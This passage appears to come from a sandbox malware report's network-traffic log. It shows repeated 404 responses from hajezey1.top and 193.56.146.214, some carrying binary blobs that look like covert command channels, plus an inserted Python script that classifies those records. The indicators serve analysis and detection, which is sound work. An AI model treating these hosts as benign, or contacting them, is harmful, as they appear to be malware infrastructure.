404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at hajezey1.top Port 80</address></body></html>0
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 12:10:11 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 61 6a 65 7a 65 79 31 2e 74 6f 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 190<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at hajezey1.top Port 80</address></body></html>0
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 12:10:12 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 33 30 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad 9f 1c 4f 8e 8e 5f 04 25 18 f5 aa 85 b9 a5 13 ea 0e cb 2d e5 00 0c cc 52 a2 bd 71 b6 64 50 06 b9 0d 0a 30 0d 0a 0d 0a Data Ascii: 30I:82O_%-RqdP0
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 12:10:12 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 61 6a 65 7a 65 79 31 2e 74 6f 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 190<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at hajezey1.top Port 80</address></body></html>0
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 12:10:13 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 61 6a 65 7a 65 79 31 2e 74 6f 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 190<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at hajezey1.top Port 80</address></body></html>0
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 12:10:13 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 61 6a 65 7a 65 79 31 2e 74 6f 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 190<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at hajezey1.top Port 80</address></body></html>0
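Every response captured above is an HTTP/1.1 404 from the same nginx/1.20.1 front end with a chunked text/html body, but the bodies fall into two kinds: the Apache error page for hajezey1.top (nginx is proxying an Apache backend, as the `<address>` line in the HTML shows) and short binary blobs (0x19, 0x2c, 0x30, 0x46 bytes) plus longer 0x1f66-byte ones that are not HTML at all. The Python script below is an added example and is not part of the Joe Sandbox report or of the analysed sample: it parses records in the report's `Data Raw:` shape, reassembles the chunked body, and labels each 404 as `html-404`, `binary-404` or `truncated`. The record strings and the HTML body are constructed here to mirror the captures; the 44-byte `BIN_BODY` reproduces the body of the 12:09:44 response above; the 0.9 printable-ratio threshold is an assumed heuristic, not something the report states.

```python
"""Triage sandbox "HTTP traffic detected" records: decode the chunked body in
the "Data Raw:" column and flag 404 responses that declare text/html but
deliver a binary blob.  Added example; not part of the report or the sample."""
import math
import re
from collections import Counter
from dataclasses import dataclass

STATUS_RE = re.compile(r"HTTP/1\.[01] (\d{3})")
# The report fuses consecutive headers with no separator, so a header value
# ends at ';' or at the capitalised first letter of the next header name.
CTYPE_RE = re.compile(r"Content-Type: (\S+?)(?=;|[A-Z])")
RAW_RE = re.compile(r"Data Raw: ((?:[0-9a-f]{2}\s?)+)")


def dechunk(raw: bytes) -> bytes:
    """Reassemble an HTTP/1.1 chunked body; raise ValueError if the dump is cut off."""
    out, pos = bytearray(), 0
    while True:
        eol = raw.find(b"\r\n", pos)
        if eol < 0:
            raise ValueError("truncated: no chunk-size line")
        size = int(raw[pos:eol].split(b";")[0], 16)  # drop any chunk extension
        if size == 0:
            return bytes(out)
        start, end = eol + 2, eol + 2 + size
        if end + 2 > len(raw):
            raise ValueError("truncated: chunk data incomplete")
        out += raw[start:end]
        pos = end + 2  # step over the CRLF that terminates the chunk


def shannon_entropy(data: bytes) -> float:
    n = len(data)
    if n == 0:
        return 0.0
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values())


def printable_ratio(data: bytes) -> float:
    """Share of bytes that are printable ASCII, tab, LF or CR."""
    if not data:
        return 0.0
    return sum(32 <= b < 127 or b in (9, 10, 13) for b in data) / len(data)


def looks_like_html(body: bytes) -> bool:
    return body.lstrip()[:16].lower().startswith((b"<!doctype", b"<html"))


@dataclass
class Verdict:
    status: str
    content_type: str
    body_len: int
    entropy: float
    label: str  # html-404 | binary-404 | truncated | other


def triage(record: str) -> Verdict:
    status, ctype, raw = (rx.search(record) for rx in (STATUS_RE, CTYPE_RE, RAW_RE))
    if not (status and raw):
        return Verdict("?", "?", 0, 0.0, "other")
    code = status.group(1)
    content_type = ctype.group(1) if ctype else "?"
    data = bytes.fromhex(raw.group(1))  # fromhex ignores the separating spaces
    try:
        body = dechunk(data) if "Transfer-Encoding: chunked" in record else data
    except ValueError:
        return Verdict(code, content_type, len(data), shannon_entropy(data), "truncated")
    if code == "404" and content_type.startswith("text/html"):
        if looks_like_html(body) and printable_ratio(body) > 0.9:  # assumed threshold
            label = "html-404"
        else:
            label = "binary-404"  # text/html declared, raw bytes delivered
    else:
        label = "other"
    return Verdict(code, content_type, len(body), shannon_entropy(body), label)


def chunked(body: bytes) -> bytes:
    """Wrap a body in one chunk plus the terminating zero-length chunk."""
    return b"%x\r\n%s\r\n0\r\n\r\n" % (len(body), body)


# Constructed inputs in the report's record shape.  HTML_BODY mirrors the
# proxied Apache error page; BIN_BODY is the 44-byte body of the 12:09:44 response.
HEADERS = ("Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not Found"
           "Server: nginx/1.20.1Date: Fri, 29 Oct 2021 12:09:44 GMT"
           "Content-Type: text/html; charset=utf-8Transfer-Encoding: chunked"
           "Connection: closeData Raw: ")
HTML_BODY = (b'<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">\r\n<html><head>\r\n'
             b'<title>404 Not Found</title>\r\n</head><body>\r\n<h1>Not Found</h1>\r\n'
             b'</body></html>\r\n')
BIN_BODY = bytes.fromhex(
    "0000d392a049bd3a383211af01b5dbadd6094f93d610493a40a8e8dde1fd5ff74d9171b2424a844bf4f12c89")
SAMPLE_RECORDS = [
    HEADERS + chunked(HTML_BODY).hex(" ") + " Data Ascii: ...",
    HEADERS + chunked(BIN_BODY).hex(" ") + " Data Ascii: ...",
    HEADERS + chunked(BIN_BODY).hex(" ")[:40],  # dump cut off mid-chunk, like the long ones
]

if __name__ == "__main__":
    for rec in SAMPLE_RECORDS:
        print(triage(rec))
```

Run against the records in this section, the script separates the backend's generic error page from the responses that deserve carving: the 44-byte body scores a printable ratio of 16/44 (exactly the `I:82OI:@_MqBJK,` fragment the report renders in its Data Ascii column) and lands in `binary-404`. The 0x1f66-byte dumps are cut off in the report itself, so they come back `truncated` rather than being guessed at; a complete PCAP is needed before anything can be said about their content.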
                Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Server: nginx/1.20.1 Date: Fri, 29 Oct 2021 12:10:13 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: close
                Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Server: nginx/1.20.1 Date: Fri, 29 Oct 2021 12:10:15 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: close Data Ascii: 190<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at hajezey1.top Port 80</address></body></html>0
                Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Server: nginx/1.20.1 Date: Fri, 29 Oct 2021 12:10:16 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: close Data Ascii: 190<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at hajezey1.top Port 80</address></body></html>0
                Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Server: nginx/1.20.1 Date: Fri, 29 Oct 2021 12:10:16 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: close
                Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Server: nginx/1.20.1 Date: Fri, 29 Oct 2021 12:10:20 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: close Data Ascii: 190<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at hajezey1.top Port 80</address></body></html>0
                Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Server: nginx/1.20.1 Date: Fri, 29 Oct 2021 12:10:20 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: close Data Raw: 32 39 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f d2 9e 55 06 63 17 e5 ff dc fc be 1e b4 53 d9 63 ba 53 11 91 1d f4 0d 0a 30 0d 0a 0d 0a Data Ascii: 29I:82OUcScS0
                Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Server: nginx/1.20.1 Date: Fri, 29 Oct 2021 12:10:27 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: close Data Ascii: 190<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at hajezey1.top Port 80</address></body></html>0
                Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Server: nginx/1.20.1 Date: Fri, 29 Oct 2021 12:10:57 GMT Content-Type: text/html; charset=utf-8 Content-Length: 7 Connection: keep-alive X-Powered-By: PHP/5.6.40 Data Raw: 03 00 00 00 1d 3d 5d Data Ascii: =]
                Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Server: nginx/1.20.1 Date: Fri, 29 Oct 2021 12:10:57 GMT Content-Type: text/html; charset=utf-8 Content-Length: 42 Connection: keep-alive X-Powered-By: PHP/5.6.40 Data Raw: 00 00 b5 55 08 b5 79 73 2f 7e 28 10 e8 c3 a7 f7 be 60 3a 07 9b 01 c2 40 9c e2 0f b3 66 f5 26 0a 5b 22 f9 6a 00 7e c2 5d 31 0e Data Ascii: Uys/~(`:@f&["j~]1
                Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Date: Fri, 29 Oct 2021 12:11:02 GMT Server: Apache/2.4.29 (Ubuntu) Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html; charset=utf-8
                Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Date: Fri, 29 Oct 2021 12:11:03 GMT Server: Apache/2.4.29 (Ubuntu) Keep-Alive: timeout=5, max=99 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html; charset=utf-8
                Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Server: nginx/1.20.1 Date: Fri, 29 Oct 2021 12:11:04 GMT Content-Type: text/html; charset=utf-8 Content-Length: 327 Connection: keep-alive X-Powered-By: PHP/5.6.40 Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
                Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Server: nginx/1.20.1 Date: Fri, 29 Oct 2021 12:11:04 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/5.6.40
                Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Date: Fri, 29 Oct 2021 12:11:05 GMT Server: Apache/2.4.29 (Ubuntu) Content-Length: 402 Keep-Alive: timeout=5, max=98 Connection: Keep-Alive Content-Type: text/html; charset=utf-8 Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at 193.56.146.214 Port 80</address></body></html>
                Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Date: Fri, 29 Oct 2021 12:11:05 GMT Server: Apache/2.4.29 (Ubuntu) Keep-Alive: timeout=5, max=97 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html; charset=utf-8
                Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Server: nginx/1.20.1 Date: Fri, 29 Oct 2021 12:11:08 GMT Content-Type: text/html; charset=utf-8 Content-Length: 327 Connection: keep-alive X-Powered-By: PHP/5.6.40 Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
                Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Server: nginx/1.20.1 Date: Fri, 29 Oct 2021 12:11:08 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/5.6.40
                Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Date: Fri, 29 Oct 2021 12:11:09 GMT Server: Apache/2.4.29 (Ubuntu) Content-Length: 402 Keep-Alive: timeout=5, max=96 Connection: Keep-Alive Content-Type: text/html; charset=utf-8 Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at 193.56.146.214 Port 80</address></body></html>
                Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Date: Fri, 29 Oct 2021 12:11:09 GMT Server: Apache/2.4.29 (Ubuntu) Keep-Alive: timeout=5, max=95 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html; charset=utf-8
                Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Server: nginx/1.20.1 Date: Fri, 29 Oct 2021 12:11:11 GMT Content-Type: text/html; charset=utf-8 Content-Length: 327 Connection: keep-alive X-Powered-By: PHP/5.6.40 Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
                Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Server: nginx/1.20.1 Date: Fri, 29 Oct 2021 12:11:11 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/5.6.40
                Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Date: Fri, 29 Oct 2021 12:11:12 GMT Server: Apache/2.4.29 (Ubuntu) Content-Length: 402 Keep-Alive: timeout=5, max=94 Connection: Keep-Alive Content-Type: text/html; charset=utf-8 Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at 193.56.146.214 Port 80</address></body></html>
                Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Date: Fri, 29 Oct 2021 12:11:12 GMT Server: Apache/2.4.29 (Ubuntu) Keep-Alive: timeout=5, max=93 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html; charset=utf-8
                Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Server: nginx/1.20.1 Date: Fri, 29 Oct 2021 12:11:13 GMT Content-Type: text/html; charset=utf-8 Content-Length: 327 Connection: keep-alive X-Powered-By: PHP/5.6.40 Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
                Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Server: nginx/1.20.1 Date: Fri, 29 Oct 2021 12:11:13 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/5.6.40
                Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Server: nginx/1.20.1 Date: Fri, 29 Oct 2021 12:11:16 GMT Content-Type: text/html; charset=utf-8 Content-Length: 327 Connection: keep-alive X-Powered-By: PHP/5.6.40 Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
                Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Server: nginx/1.20.1 Date: Fri, 29 Oct 2021 12:11:17 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/5.6.40
                Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Date: Fri, 29 Oct 2021 12:11:17 GMT Server: Apache/2.4.29 (Ubuntu) Content-Length: 402 Keep-Alive: timeout=5, max=92 Connection: Keep-Alive Content-Type: text/html; charset=utf-8 Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at 193.56.146.214 Port 80</address></body></html>
                Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Date: Fri, 29 Oct 2021 12:11:19 GMT Server: Apache/2.4.29 (Ubuntu) Content-Length: 402 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=utf-8 Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at 193.56.146.214 Port 80</address></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 12:11:19 GMTContent-Type: text/html; charset=utf-8Content-Length: 327Connection: keep-aliveX-Powered-By: PHP/5.6.40Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 